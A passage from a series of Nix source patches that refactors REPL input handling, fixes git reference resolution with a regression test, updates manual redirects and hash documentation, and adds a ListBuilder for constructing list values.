-  auto possible = curRepl->completePrefix(s);
-
-  if (possible.size() > (INT_MAX / sizeof(char*)))
-    throw Error("too many completions");
-
-  int ac = 0;
-  char **vp = nullptr;
-
-  auto check = [&](auto *p) {
-    if (!p) {
-      if (vp) {
-        while (--ac >= 0)
-          free(vp[ac]);
-        free(vp);
-      }
-      throw Error("allocation failure");
-    }
-    return p;
-  };
-
-  vp = check((char **)malloc(possible.size() * sizeof(char*)));
-
-  for (auto & p : possible)
-    vp[ac++] = check(strdup(p.c_str()));
-
-  *avp = vp;
-
-  return ac;
-}
-
-namespace {
-    // Used to communicate to NixRepl::getLine whether a signal occurred in ::readline.
-    volatile sig_atomic_t g_signal_received = 0;
-
-    void sigintHandler(int signo) {
-        g_signal_received = signo;
-    }
-}
-
 static std::ostream & showDebugTrace(std::ostream & out, const PosTable & positions, const DebugTrace & dt)
 {
     if (dt.isError)
@@ -281,24 +186,7 @@ ReplExitStatus NixRepl::mainLoop()
 
     loadFiles();
 
-    // Allow nix-repl specific settings in .inputrc
-    rl_readline_name = "nix-repl";
-    try {
-        createDirs(dirOf(historyFile));
-    } catch (SystemError & e) {
-        logWarning(e.info());
-    }
-#ifndef USE_READLINE
-    el_hist_size = 1000;
-#endif
-    read_history(historyFile.c_str());
-    auto oldRepl = curRepl;
-    curRepl = this;
-    Finally restoreRepl([&] { curRepl = oldRepl; });
-#ifndef USE_READLINE
-    rl_set_complete_func(completionCallback);
-    rl_set_list_possib_func(listPossibleCallback);
-#endif
+    auto _guard = interacter->init(static_cast(this));
 
     std::string input;
 
@@ -307,7 +195,7 @@ ReplExitStatus NixRepl::mainLoop()
         logger->pause();
         // When continuing input from previous lines, don't print a prompt, just align to the same
         // number of chars as the prompt.
-        if (!getLine(input, input.empty() ? "nix-repl> " : "          ")) {
+        if (!interacter->getLine(input, input.empty() ? "nix-repl> " : "          ")) {
             // Ctrl-D should exit the debugger.
             state->debugStop = false;
             logger->cout("");
@@ -356,51 +244,6 @@ ReplExitStatus NixRepl::mainLoop()
     }
 }
 
-
-bool NixRepl::getLine(std::string & input, const std::string & prompt)
-{
-    struct sigaction act, old;
-    sigset_t savedSignalMask, set;
-
-    auto setupSignals = [&]() {
-        act.sa_handler = sigintHandler;
-        sigfillset(&act.sa_mask);
-        act.sa_flags = 0;
-        if (sigaction(SIGINT, &act, &old))
-            throw SysError("installing handler for SIGINT");
-
-        sigemptyset(&set);
-        sigaddset(&set, SIGINT);
-        if (sigprocmask(SIG_UNBLOCK, &set, &savedSignalMask))
-            throw SysError("unblocking SIGINT");
-    };
-    auto restoreSignals = [&]() {
-        if (sigprocmask(SIG_SETMASK, &savedSignalMask, nullptr))
-            throw SysError("restoring signals");
-
-        if (sigaction(SIGINT, &old, 0))
-            throw SysError("restoring handler for SIGINT");
-    };
-
-    setupSignals();
-    char * s = readline(prompt.c_str());
-    Finally doFree([&]() { free(s); });
-    restoreSignals();
-
-    if (g_signal_received) {
-        g_signal_received = 0;
-        input.clear();
-        return true;
-    }
-
-    if (!s)
-      return false;
-    input += s;
-    input += '\n';
-    return true;
-}
-
-
 StringSet NixRepl::completePrefix(const std::string & prefix)
 {
     StringSet completions;
diff --git a/src/libcmd/repl.hh b/src/libcmd/repl.hh
index 21aa8bfc7..aac79ec74 100644
--- a/src/libcmd/repl.hh
+++ b/src/libcmd/repl.hh
@@ -3,11 +3,6 @@
 
 #include "eval.hh"
 
-#if HAVE_BOEHMGC
-#define GC_INCLUDE_NEW
-#include 
-#endif
-
 namespace nix {
 
 struct AbstractNixRepl

From ea31b8a117e0a2e18809fd3921209d106d9040c8 Mon Sep 17 00:00:00 2001
From: Jade Lovelace 
Date: Mon, 26 Feb 2024 00:43:44 -0800
Subject: [PATCH 621/654] refactor: repl prompts are now the job of the
 interacter

---
 src/libcmd/repl-interacter.cc | 19 +++++++++++++++----
 src/libcmd/repl-interacter.hh |  4 ++--
 src/libcmd/repl.cc            |  2 +-
 3 files changed, 18 insertions(+), 7 deletions(-)

diff --git a/src/libcmd/repl-interacter.cc b/src/libcmd/repl-interacter.cc
index 9aa1f7bb9..3e34ecdb6 100644
--- a/src/libcmd/repl-interacter.cc
+++ b/src/libcmd/repl-interacter.cc
@@ -1,5 +1,3 @@
-#include "file-system.hh"
-#include "libcmd/repl.hh"
 #include 
 
 #ifdef USE_READLINE
@@ -19,6 +17,8 @@ extern "C" {
 #include "signals.hh"
 #include "finally.hh"
 #include "repl-interacter.hh"
+#include "file-system.hh"
+#include "libcmd/repl.hh"
 
 namespace nix {
 
@@ -124,7 +124,18 @@ ReadlineLikeInteracter::Guard ReadlineLikeInteracter::init(detail::ReplCompleter
     return restoreRepl;
 }
 
-bool ReadlineLikeInteracter::getLine(std::string & input, const std::string & prompt)
+static constexpr const char * promptForType(ReplPromptType promptType)
+{
+    switch (promptType) {
+    case ReplPromptType::ReplPrompt:
+        return "nix-repl> ";
+    case ReplPromptType::ContinuationPrompt:
+        return "          ";
+    }
+    assert(false);
+}
+
+bool ReadlineLikeInteracter::getLine(std::string & input, ReplPromptType promptType)
 {
     struct sigaction act, old;
     sigset_t savedSignalMask, set;
@@ -150,7 +161,7 @@ bool ReadlineLikeInteracter::getLine(std::string & input, const std::string & pr
     };
 
     setupSignals();
-    char * s = readline(prompt.c_str());
+    char * s = readline(promptForType(promptType));
     Finally doFree([&]() { free(s); });
     restoreSignals();
 
diff --git a/src/libcmd/repl-interacter.hh b/src/libcmd/repl-interacter.hh
index e549bab36..cc70efd07 100644
--- a/src/libcmd/repl-interacter.hh
+++ b/src/libcmd/repl-interacter.hh
@@ -28,7 +28,7 @@ public:
 
     virtual Guard init(detail::ReplCompleterMixin * repl) = 0;
     /** Returns a boolean of whether the interacter got EOF */
-    virtual bool getLine(std::string & input, const std::string & prompt) = 0;
+    virtual bool getLine(std::string & input, ReplPromptType promptType) = 0;
     virtual ~ReplInteracter(){};
 };
 
@@ -41,7 +41,7 @@ public:
     {
     }
     virtual Guard init(detail::ReplCompleterMixin * repl) override;
-    virtual bool getLine(std::string & input, const std::string & prompt) override;
+    virtual bool getLine(std::string & input, ReplPromptType promptType) override;
     virtual ~ReadlineLikeInteracter() override;
 };
 
diff --git a/src/libcmd/repl.cc b/src/libcmd/repl.cc
index 8af3c5ff3..228d66f5e 100644
--- a/src/libcmd/repl.cc
+++ b/src/libcmd/repl.cc
@@ -195,7 +195,7 @@ ReplExitStatus NixRepl::mainLoop()
         logger->pause();
         // When continuing input from previous lines, don't print a prompt, just align to the same
         // number of chars as the prompt.
-        if (!interacter->getLine(input, input.empty() ? "nix-repl> " : "          ")) {
+        if (!interacter->getLine(input, input.empty() ? ReplPromptType::ReplPrompt : ReplPromptType::ContinuationPrompt)) {
             // Ctrl-D should exit the debugger.
             state->debugStop = false;
             logger->cout("");

From e5840d57605bdc67fa1a1948e601734e99d1cb91 Mon Sep 17 00:00:00 2001
From: Emanuel Czirai 
Date: Wed, 13 Mar 2024 20:35:24 +0100
Subject: [PATCH 622/654] typo consant->constant in context.cc

---
 src/libexpr/primops/context.cc | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/src/libexpr/primops/context.cc b/src/libexpr/primops/context.cc
index 1eec8b316..88502fe2d 100644
--- a/src/libexpr/primops/context.cc
+++ b/src/libexpr/primops/context.cc
@@ -137,7 +137,7 @@ static RegisterPrimOp primop_addDrvOutputDependencies({
     .name = "__addDrvOutputDependencies",
     .args = {"s"},
     .doc = R"(
-      Create a copy of the given string where a single consant string context element is turned into a "derivation deep" string context element.
+      Create a copy of the given string where a single constant string context element is turned into a "derivation deep" string context element.
 
       The store path that is the constant string context element should point to a valid derivation, and end in `.drv`.
 

From 60c2d15f5a7db86eb79c11c4a863789d186e8650 Mon Sep 17 00:00:00 2001
From: Bouke van der Bijl 
Date: Thu, 14 Mar 2024 14:04:51 +0100
Subject: [PATCH 623/654] git fetcher: use resolveRef for getting revision of
 reference

* Add regression test
* Fix 'no repo' test so it doesn't succeed if the data is still in cache
* Use git_revparse_single inside git-utils instead of reimplementing the same logic.
---
 src/libfetchers/git-utils.cc | 24 ++++--------------------
 src/libfetchers/git.cc       |  2 +-
 tests/functional/fetchGit.sh |  9 +++++++++
 3 files changed, 14 insertions(+), 21 deletions(-)

diff --git a/src/libfetchers/git-utils.cc b/src/libfetchers/git-utils.cc
index 9cae9034e..b723554cc 100644
--- a/src/libfetchers/git-utils.cc
+++ b/src/libfetchers/git-utils.cc
@@ -21,6 +21,7 @@
 #include 
 #include 
 #include 
+#include 
 #include 
 #include 
 #include 
@@ -199,27 +200,10 @@ struct GitRepoImpl : GitRepo, std::enable_shared_from_this
 
     Hash resolveRef(std::string ref) override
     {
-        // Handle revisions used as refs.
-        {
-            git_oid oid;
-            if (git_oid_fromstr(&oid, ref.c_str()) == 0)
-                return toHash(oid);
-        }
-
-        // Resolve short names like 'master'.
-        Reference ref2;
-        if (!git_reference_dwim(Setter(ref2), *this, ref.c_str()))
-            ref = git_reference_name(ref2.get());
-
-        // Resolve full references like 'refs/heads/master'.
-        Reference ref3;
-        if (git_reference_lookup(Setter(ref3), *this, ref.c_str()))
+        Object object;
+        if (git_revparse_single(Setter(object), *this, ref.c_str()))
             throw Error("resolving Git reference '%s': %s", ref, git_error_last()->message);
-
-        auto oid = git_reference_target(ref3.get());
-        if (!oid)
-            throw Error("cannot get OID for Git reference '%s'", git_reference_name(ref3.get()));
-
+        auto oid = git_object_id(object.get());
         return toHash(*oid);
     }
 
diff --git a/src/libfetchers/git.cc b/src/libfetchers/git.cc
index 25eabb1dc..34cfd3f5b 100644
--- a/src/libfetchers/git.cc
+++ b/src/libfetchers/git.cc
@@ -585,7 +585,7 @@ struct GitInputScheme : InputScheme
                         repoInfo.url
                         );
             } else
-                input.attrs.insert_or_assign("rev", Hash::parseAny(chomp(readFile(localRefFile)), HashAlgorithm::SHA1).gitRev());
+                input.attrs.insert_or_assign("rev", repo->resolveRef(ref).gitRev());
 
             // cache dir lock is removed at scope end; we will only use read-only operations on specific revisions in the remainder
         }
diff --git a/tests/functional/fetchGit.sh b/tests/functional/fetchGit.sh
index 3f2d0d5fb..74d6de4e3 100644
--- a/tests/functional/fetchGit.sh
+++ b/tests/functional/fetchGit.sh
@@ -43,10 +43,18 @@ path0_=$(nix eval --impure --raw --expr "(builtins.fetchTree git+file://$TEST_RO
 export _NIX_FORCE_HTTP=1
 [[ $(tail -n 1 $path0/hello) = "hello" ]]
 
+# Nuke the cache
+rm -rf $TEST_HOME/.cache/nix
+
 # Fetch the default branch.
 path=$(nix eval --impure --raw --expr "(builtins.fetchGit file://$repo).outPath")
 [[ $(cat $path/hello) = world ]]
 
+# Fetch when the cache has packed-refs
+# Regression test of #8822
+git -C $TEST_HOME/.cache/nix/gitv3/*/ pack-refs --all
+path=$(nix eval --impure --raw --expr "(builtins.fetchGit file://$repo).outPath")
+
 # Fetch a rev from another branch
 git -C $repo checkout -b devtest
 echo "different file" >> $TEST_ROOT/git/differentbranch
@@ -251,6 +259,7 @@ path12=$(nix eval --impure --raw --expr "(builtins.fetchGit { url = file://$repo
 
 # should fail if there is no repo
 rm -rf $repo/.git
+rm -rf $TEST_HOME/.cache/nix
 (! nix eval --impure --raw --expr "(builtins.fetchGit \"file://$repo\").outPath")
 
 # should succeed for a repo without commits

From 3754614b9cd2d1a16cbc3eb4c8011c32918c4baa Mon Sep 17 00:00:00 2001
From: Valentin Gagarin 
Date: Thu, 14 Mar 2024 15:01:47 +0100
Subject: [PATCH 624/654] adjust anchor redirects to point to new pages

a previous moving of files accounted for server-side redirects, but not
client-side redirects.
---
 doc/manual/redirects.js | 10 +++++-----
 1 file changed, 5 insertions(+), 5 deletions(-)

diff --git a/doc/manual/redirects.js b/doc/manual/redirects.js
index 28b80f589..25648969d 100644
--- a/doc/manual/redirects.js
+++ b/doc/manual/redirects.js
@@ -14,7 +14,7 @@
 
 const redirects = {
  "index.html": {
-    "part-advanced-topics": "advanced-topics/advanced-topics.html",
+    "part-advanced-topics": "advanced-topics/index.html",
     "chap-tuning-cores-and-jobs": "advanced-topics/cores-vs-jobs.html",
     "chap-diff-hook": "advanced-topics/diff-hook.html",
     "check-dirs-are-unregistered": "advanced-topics/diff-hook.html#check-dirs-are-unregistered",
@@ -22,7 +22,7 @@ const redirects = {
     "chap-post-build-hook": "advanced-topics/post-build-hook.html",
     "chap-post-build-hook-caveats": "advanced-topics/post-build-hook.html#implementation-caveats",
     "chap-writing-nix-expressions": "language/index.html",
-    "part-command-ref": "command-ref/command-ref.html",
+    "part-command-ref": "command-ref/index.html",
     "conf-allow-import-from-derivation": "command-ref/conf-file.html#conf-allow-import-from-derivation",
     "conf-allow-new-privileges": "command-ref/conf-file.html#conf-allow-new-privileges",
     "conf-allowed-uris": "command-ref/conf-file.html#conf-allowed-uris",
@@ -261,7 +261,7 @@ const redirects = {
     "sec-installer-proxy-settings": "installation/env-variables.html#proxy-environment-variables",
     "sec-nix-ssl-cert-file": "installation/env-variables.html#nix_ssl_cert_file",
     "sec-nix-ssl-cert-file-with-nix-daemon-and-macos": "installation/env-variables.html#nix_ssl_cert_file-with-macos-and-the-nix-daemon",
-    "chap-installation": "installation/installation.html",
+    "chap-installation": "installation/index.html",
     "ch-installing-binary": "installation/installing-binary.html",
     "sect-macos-installation": "installation/installing-binary.html#macos-installation",
     "sect-macos-installation-change-store-prefix": "installation/installing-binary.html#macos-installation",
@@ -288,7 +288,7 @@ const redirects = {
     "ssec-copy-closure": "package-management/copy-closure.html",
     "sec-garbage-collection": "package-management/garbage-collection.html",
     "ssec-gc-roots": "package-management/garbage-collector-roots.html",
-    "chap-package-management": "package-management/package-management.html",
+    "chap-package-management": "package-management/index.html",
     "sec-profiles": "package-management/profiles.html",
     "ssec-s3-substituter": "package-management/s3-substituter.html",
     "ssec-s3-substituter-anonymous-reads": "package-management/s3-substituter.html#anonymous-reads-to-your-s3-compatible-binary-cache",
@@ -297,7 +297,7 @@ const redirects = {
     "sec-sharing-packages": "package-management/sharing-packages.html",
     "ssec-ssh-substituter": "package-management/ssh-substituter.html",
     "chap-quick-start": "quick-start.html",
-    "sec-relnotes": "release-notes/release-notes.html",
+    "sec-relnotes": "release-notes/index.html",
     "ch-relnotes-0.10.1": "release-notes/rl-0.10.1.html",
     "ch-relnotes-0.10": "release-notes/rl-0.10.html",
     "ssec-relnotes-0.11": "release-notes/rl-0.11.html",

From a50295425ea205863ef41f66cfbe9c01937ebd08 Mon Sep 17 00:00:00 2001
From: Dimitar Nestorov <8790386+DimitarNestorov@users.noreply.github.com>
Date: Thu, 14 Mar 2024 16:15:52 +0200
Subject: [PATCH 625/654] docs: update registry examples

When you run `nix flake info` you get a deprecated message
---
 src/nix/registry-pin.md | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

diff --git a/src/nix/registry-pin.md b/src/nix/registry-pin.md
index ebc0e3eff..5ad4f8709 100644
--- a/src/nix/registry-pin.md
+++ b/src/nix/registry-pin.md
@@ -15,10 +15,10 @@ R""(
   user   flake:nixpkgs github:NixOS/nixpkgs/925b70cd964ceaedee26fde9b19cc4c4f081196a
   ```
 
-  and `nix flake info` will say:
+  and `nix flake metadata` will say:
 
   ```console
-  # nix flake info nixpkgs
+  # nix flake metadata nixpkgs
   Resolved URL:  github:NixOS/nixpkgs/925b70cd964ceaedee26fde9b19cc4c4f081196a
   Locked URL:    github:NixOS/nixpkgs/925b70cd964ceaedee26fde9b19cc4c4f081196a
   …

From 49e9efeaaaf4546f8daa2e33dd5191a2c288f737 Mon Sep 17 00:00:00 2001
From: Daniel Sidhion 
Date: Thu, 14 Mar 2024 23:09:47 -0700
Subject: [PATCH 626/654] doc: document SRI hash format for `outputHash`
 (#10230)

---
 doc/manual/src/language/advanced-attributes.md | 15 +++++++--------
 1 file changed, 7 insertions(+), 8 deletions(-)

diff --git a/doc/manual/src/language/advanced-attributes.md b/doc/manual/src/language/advanced-attributes.md
index 7306fc182..b3e3afe3b 100644
--- a/doc/manual/src/language/advanced-attributes.md
+++ b/doc/manual/src/language/advanced-attributes.md
@@ -188,9 +188,13 @@ Derivations can declare some infrequently used optional attributes.
     }
     ```
 
-    The `outputHashAlgo` attribute specifies the hash algorithm used to
-    compute the hash. It can currently be `"sha1"`, `"sha256"` or
-    `"sha512"`.
+    The `outputHash` attribute must be a string containing the hash in either hexadecimal or "nix32" encoding, or following the format for integrity metadata as defined by [SRI](https://www.w3.org/TR/SRI/).
+    The "nix32" encoding is an adaptation of base-32 encoding.
+    The [`convertHash`](@docroot@/language/builtins.md#builtins-convertHash) function shows how to convert between different encodings, and the [`nix-hash` command](../command-ref/nix-hash.md) has information about obtaining the hash for some contents, as well as converting to and from encodings.
+
+    The `outputHashAlgo` attribute specifies the hash algorithm used to compute the hash.
+    It can currently be `"sha1"`, `"sha256"`, `"sha512"`, or `null`.
+    `outputHashAlgo` can only be `null` when `outputHash` follows the SRI format.
 
     The `outputHashMode` attribute determines how the hash is computed.
     It must be one of the following two values:
@@ -209,11 +213,6 @@ Derivations can declare some infrequently used optional attributes.
         this case, the output can be anything, including a directory
         tree.
 
-    The `outputHash` attribute, finally, must be a string containing
-    the hash in either hexadecimal or base-32 notation. (See the
-    [`nix-hash` command](../command-ref/nix-hash.md) for information
-    about converting to and from base-32 notation.)
-
   - [`__contentAddressed`]{#adv-attr-__contentAddressed}
     > **Warning**
     > This attribute is part of an [experimental feature](@docroot@/contributing/experimental-features.md).

From fecff520d7ce6598319862efc50c2dc6e1f6e9d9 Mon Sep 17 00:00:00 2001
From: Eelco Dolstra 
Date: Thu, 14 Mar 2024 19:10:31 +0100
Subject: [PATCH 627/654] Add a ListBuilder helper for constructing list values

Previously, `state.mkList()` would set the type of the value to tList
and allocate the list vector, but it would not initialize the values
in the list. This has two problems:

* If an exception occurs, the list is left in an undefined state.

* More importantly, for multithreaded evaluation, if a value
  transitions from thunk to non-thunk, it should be final (i.e. other
  threads should be able to access the value safely).

To address this, there now is a `ListBuilder` class (analogous to
`BindingsBuilder`) to build the list vector prior to the call to
`Value::mkList()`. Typical usage:

   auto list = state.buildList(size);
   for (auto & v : list)
       v = ... set value ...;
   vRes.mkList(list);
---
 src/libexpr/eval.cc               |  24 ++--
 src/libexpr/eval.hh               |  12 +-
 src/libexpr/json-to-value.cc      |   9 +-
 src/libexpr/primops.cc            | 202 ++++++++++++++++--------------
 src/libexpr/primops/context.cc    |   6 +-
 src/libexpr/primops/fromTOML.cc   |   8 +-
 src/libexpr/value.hh              |  43 ++++++-
 src/nix-env/nix-env.cc            |   2 +-
 src/nix-env/user-env.cc           |  17 +--
 tests/unit/libexpr/value/print.cc |  62 +++++----
 10 files changed, 228 insertions(+), 157 deletions(-)

diff --git a/src/libexpr/eval.cc b/src/libexpr/eval.cc
index bbccfcd29..297832818 100644
--- a/src/libexpr/eval.cc
+++ b/src/libexpr/eval.cc
@@ -435,7 +435,8 @@ EvalState::EvalState(
 
     static_assert(sizeof(Env) <= 16, "environment must be <= 16 bytes");
 
-    vEmptyList.mkList(0);
+    vEmptyList.mkList(buildList(0));
+    vNull.mkNull();
 
     /* Initialise the Nix expression search path. */
     if (!evalSettings.pureEval) {
@@ -923,12 +924,11 @@ inline Value * EvalState::lookupVar(Env * env, const ExprVar & var, bool noEval)
     }
 }
 
-void EvalState::mkList(Value & v, size_t size)
+ListBuilder::ListBuilder(EvalState & state, size_t size)
+    : size(size)
+    , elems(size <= 2 ? inlineElems : (Value * *) allocBytes(size * sizeof(Value *)))
 {
-    v.mkList(size);
-    if (size > 2)
-        v.bigList.elems = (Value * *) allocBytes(size * sizeof(Value *));
-    nrListElems += size;
+    state.nrListElems += size;
 }
 
 
@@ -1353,9 +1353,10 @@ void ExprLet::eval(EvalState & state, Env & env, Value & v)
 
 void ExprList::eval(EvalState & state, Env & env, Value & v)
 {
-    state.mkList(v, elems.size());
-    for (auto [n, v2] : enumerate(v.listItems()))
-        const_cast(v2) = elems[n]->maybeThunk(state, env);
+    auto list = state.buildList(elems.size());
+    for (const auto & [n, v2] : enumerate(list))
+        v2 = elems[n]->maybeThunk(state, env);
+    v.mkList(list);
 }
 
 
@@ -1963,14 +1964,15 @@ void EvalState::concatLists(Value & v, size_t nrLists, Value * * lists, const Po
         return;
     }
 
-    mkList(v, len);
-    auto out = v.listElems();
+    auto list = buildList(len);
+    auto out = list.elems;
     for (size_t n = 0, pos = 0; n < nrLists; ++n) {
         auto l = lists[n]->listSize();
         if (l)
             memcpy(out + pos, lists[n]->listElems(), l * sizeof(Value *));
         pos += l;
     }
+    v.mkList(list);
 }
 
 
diff --git a/src/libexpr/eval.hh b/src/libexpr/eval.hh
index 368bb17b3..4a271f4ef 100644
--- a/src/libexpr/eval.hh
+++ b/src/libexpr/eval.hh
@@ -186,6 +186,11 @@ public:
      */
     Value vEmptyList;
 
+    /**
+     * Null constant.
+     */
+    Value vNull;
+
     /**
      * The accessor for the root filesystem.
      */
@@ -615,7 +620,11 @@ public:
         return BindingsBuilder(*this, allocBindings(capacity));
     }
 
-    void mkList(Value & v, size_t length);
+    ListBuilder buildList(size_t size)
+    {
+        return ListBuilder(*this, size);
+    }
+
     void mkThunk_(Value & v, Expr * expr);
     void mkPos(Value & v, PosIdx pos);
 
@@ -756,6 +765,7 @@ private:
     friend void prim_split(EvalState & state, const PosIdx pos, Value * * args, Value & v);
 
     friend struct Value;
+    friend class ListBuilder;
 };
 
 struct DebugTraceStacker {
diff --git a/src/libexpr/json-to-value.cc b/src/libexpr/json-to-value.cc
index 2d12c47c5..20bee193f 100644
--- a/src/libexpr/json-to-value.cc
+++ b/src/libexpr/json-to-value.cc
@@ -57,11 +57,10 @@ class JSONSax : nlohmann::json_sax {
         ValueVector values;
         std::unique_ptr resolve(EvalState & state) override
         {
-            Value & v = parent->value(state);
-            state.mkList(v, values.size());
-            for (size_t n = 0; n < values.size(); ++n) {
-                v.listElems()[n] = values[n];
-            }
+            auto list = state.buildList(values.size());
+            for (const auto & [n, v2] : enumerate(list))
+                v2 = values[n];
+            parent->value(state).mkList(list);
             return std::move(parent);
         }
         void add() override {
diff --git a/src/libexpr/primops.cc b/src/libexpr/primops.cc
index bc2a70496..32913d72e 100644
--- a/src/libexpr/primops.cc
+++ b/src/libexpr/primops.cc
@@ -187,13 +187,13 @@ static void import(EvalState & state, const PosIdx pos, Value & vPath, Value * v
             NixStringContextElem::DrvDeep { .drvPath = *storePath },
         });
         attrs.alloc(state.sName).mkString(drv.env["name"]);
-        auto & outputsVal = attrs.alloc(state.sOutputs);
-        state.mkList(outputsVal, drv.outputs.size());
 
+        auto list = state.buildList(drv.outputs.size());
         for (const auto & [i, o] : enumerate(drv.outputs)) {
             mkOutputString(state, attrs, *storePath, o);
-            (outputsVal.listElems()[i] = state.allocValue())->mkString(o.first);
+            (list[i] = state.allocValue())->mkString(o.first);
         }
+        attrs.alloc(state.sOutputs).mkList(list);
 
         auto w = state.allocValue();
         w->mkAttrs(attrs);
@@ -694,10 +694,10 @@ static void prim_genericClosure(EvalState & state, const PosIdx pos, Value * * a
     }
 
     /* Create the result list. */
-    state.mkList(v, res.size());
-    unsigned int n = 0;
-    for (auto & i : res)
-        v.listElems()[n++] = i;
+    auto list = state.buildList(res.size());
+    for (const auto & [n, i] : enumerate(res))
+        list[n] = i;
+    v.mkList(list);
 }
 
 static RegisterPrimOp primop_genericClosure(PrimOp {
@@ -2423,14 +2423,15 @@ static void prim_attrNames(EvalState & state, const PosIdx pos, Value * * args,
 {
     state.forceAttrs(*args[0], pos, "while evaluating the argument passed to builtins.attrNames");
 
-    state.mkList(v, args[0]->attrs->size());
+    auto list = state.buildList(args[0]->attrs->size());
 
-    size_t n = 0;
-    for (auto & i : *args[0]->attrs)
-        (v.listElems()[n++] = state.allocValue())->mkString(state.symbols[i.name]);
+    for (const auto & [n, i] : enumerate(*args[0]->attrs))
+        (list[n] = state.allocValue())->mkString(state.symbols[i.name]);
 
-    std::sort(v.listElems(), v.listElems() + n,
+    std::sort(list.begin(), list.end(),
               [](Value * v1, Value * v2) { return strcmp(v1->c_str(), v2->c_str()) < 0; });
+
+    v.mkList(list);
 }
 
 static RegisterPrimOp primop_attrNames({
@@ -2450,21 +2451,22 @@ static void prim_attrValues(EvalState & state, const PosIdx pos, Value * * args,
 {
     state.forceAttrs(*args[0], pos, "while evaluating the argument passed to builtins.attrValues");
 
-    state.mkList(v, args[0]->attrs->size());
+    auto list = state.buildList(args[0]->attrs->size());
 
-    unsigned int n = 0;
-    for (auto & i : *args[0]->attrs)
-        v.listElems()[n++] = (Value *) &i;
+    for (const auto & [n, i] : enumerate(*args[0]->attrs))
+        list[n] = (Value *) &i;
 
-    std::sort(v.listElems(), v.listElems() + n,
+    std::sort(list.begin(), list.end(),
         [&](Value * v1, Value * v2) {
             std::string_view s1 = state.symbols[((Attr *) v1)->name],
                 s2 = state.symbols[((Attr *) v2)->name];
             return s1 < s2;
         });
 
-    for (unsigned int i = 0; i < n; ++i)
-        v.listElems()[i] = ((Attr *) v.listElems()[i])->value;
+    for (auto & v : list)
+        v = ((Attr *) v)->value;
+
+    v.mkList(list);
 }
 
 static RegisterPrimOp primop_attrValues({
@@ -2805,9 +2807,10 @@ static void prim_catAttrs(EvalState & state, const PosIdx pos, Value * * args, V
             res[found++] = i->value;
     }
 
-    state.mkList(v, found);
+    auto list = state.buildList(found);
     for (unsigned int n = 0; n < found; ++n)
-        v.listElems()[n] = res[n];
+        list[n] = res[n];
+    v.mkList(list);
 }
 
 static RegisterPrimOp primop_catAttrs({
@@ -2908,43 +2911,50 @@ static void prim_zipAttrsWith(EvalState & state, const PosIdx pos, Value * * arg
     // attribute with the merge function application. this way we need not
     // use (slightly slower) temporary storage the GC does not know about.
 
-    std::map> attrsSeen;
+    struct Item
+    {
+        size_t size = 0;
+        size_t pos = 0;
+        std::optional list;
+    };
+
+    std::map attrsSeen;
 
     state.forceFunction(*args[0], pos, "while evaluating the first argument passed to builtins.zipAttrsWith");
     state.forceList(*args[1], pos, "while evaluating the second argument passed to builtins.zipAttrsWith");
-    const auto listSize = args[1]->listSize();
-    const auto listElems = args[1]->listElems();
+    const auto listItems = args[1]->listItems();
 
-    for (unsigned int n = 0; n < listSize; ++n) {
-        Value * vElem = listElems[n];
+    for (auto & vElem : listItems) {
         state.forceAttrs(*vElem, noPos, "while evaluating a value of the list passed as second argument to builtins.zipAttrsWith");
         for (auto & attr : *vElem->attrs)
-            attrsSeen[attr.name].first++;
+            attrsSeen.try_emplace(attr.name).first->second.size++;
+    }
+
+    for (auto & [sym, elem] : attrsSeen)
+        elem.list.emplace(state.buildList(elem.size));
+
+    for (auto & vElem : listItems) {
+        for (auto & attr : *vElem->attrs) {
+            auto & item = attrsSeen.at(attr.name);
+            (*item.list)[item.pos++] = attr.value;
+        }
     }
 
     auto attrs = state.buildBindings(attrsSeen.size());
+
     for (auto & [sym, elem] : attrsSeen) {
-        auto & list = attrs.alloc(sym);
-        state.mkList(list, elem.first);
-        elem.second = list.listElems();
-    }
-    v.mkAttrs(attrs.alreadySorted());
-
-    for (unsigned int n = 0; n < listSize; ++n) {
-        Value * vElem = listElems[n];
-        for (auto & attr : *vElem->attrs)
-            *attrsSeen[attr.name].second++ = attr.value;
-    }
-
-    for (auto & attr : *v.attrs) {
         auto name = state.allocValue();
-        name->mkString(state.symbols[attr.name]);
+        name->mkString(state.symbols[sym]);
         auto call1 = state.allocValue();
         call1->mkApp(args[0], name);
         auto call2 = state.allocValue();
-        call2->mkApp(call1, attr.value);
-        attr.value = call2;
+        auto arg = state.allocValue();
+        arg->mkList(*elem.list);
+        call2->mkApp(call1, arg);
+        attrs.insert(sym, call2);
     }
+
+    v.mkAttrs(attrs.alreadySorted());
 }
 
 static RegisterPrimOp primop_zipAttrsWith({
@@ -3055,9 +3065,10 @@ static void prim_tail(EvalState & state, const PosIdx pos, Value * * args, Value
     if (args[0]->listSize() == 0)
         state.error("'tail' called on an empty list").atPos(pos).debugThrow();
 
-    state.mkList(v, args[0]->listSize() - 1);
-    for (unsigned int n = 0; n < v.listSize(); ++n)
-        v.listElems()[n] = args[0]->listElems()[n + 1];
+    auto list = state.buildList(args[0]->listSize() - 1);
+    for (const auto & [n, v] : enumerate(list))
+        v = args[0]->listElems()[n + 1];
+    v.mkList(list);
 }
 
 static RegisterPrimOp primop_tail({
@@ -3088,10 +3099,11 @@ static void prim_map(EvalState & state, const PosIdx pos, Value * * args, Value
 
     state.forceFunction(*args[0], pos, "while evaluating the first argument passed to builtins.map");
 
-    state.mkList(v, args[1]->listSize());
-    for (unsigned int n = 0; n < v.listSize(); ++n)
-        (v.listElems()[n] = state.allocValue())->mkApp(
+    auto list = state.buildList(args[1]->listSize());
+    for (const auto & [n, v] : enumerate(list))
+        (v = state.allocValue())->mkApp(
             args[0], args[1]->listElems()[n]);
+    v.mkList(list);
 }
 
 static RegisterPrimOp primop_map({
@@ -3140,8 +3152,9 @@ static void prim_filter(EvalState & state, const PosIdx pos, Value * * args, Val
     if (same)
         v = *args[1];
     else {
-        state.mkList(v, k);
-        for (unsigned int n = 0; n < k; ++n) v.listElems()[n] = vs[n];
+        auto list = state.buildList(k);
+        for (const auto & [n, v] : enumerate(list)) v = vs[n];
+        v.mkList(list);
     }
 }
 
@@ -3316,12 +3329,13 @@ static void prim_genList(EvalState & state, const PosIdx pos, Value * * args, Va
     // as evaluating map without accessing any values makes little sense.
     state.forceFunction(*args[0], noPos, "while evaluating the first argument passed to builtins.genList");
 
-    state.mkList(v, len);
-    for (unsigned int n = 0; n < (unsigned int) len; ++n) {
+    auto list = state.buildList(len);
+    for (const auto & [n, v] : enumerate(list)) {
         auto arg = state.allocValue();
         arg->mkInt(n);
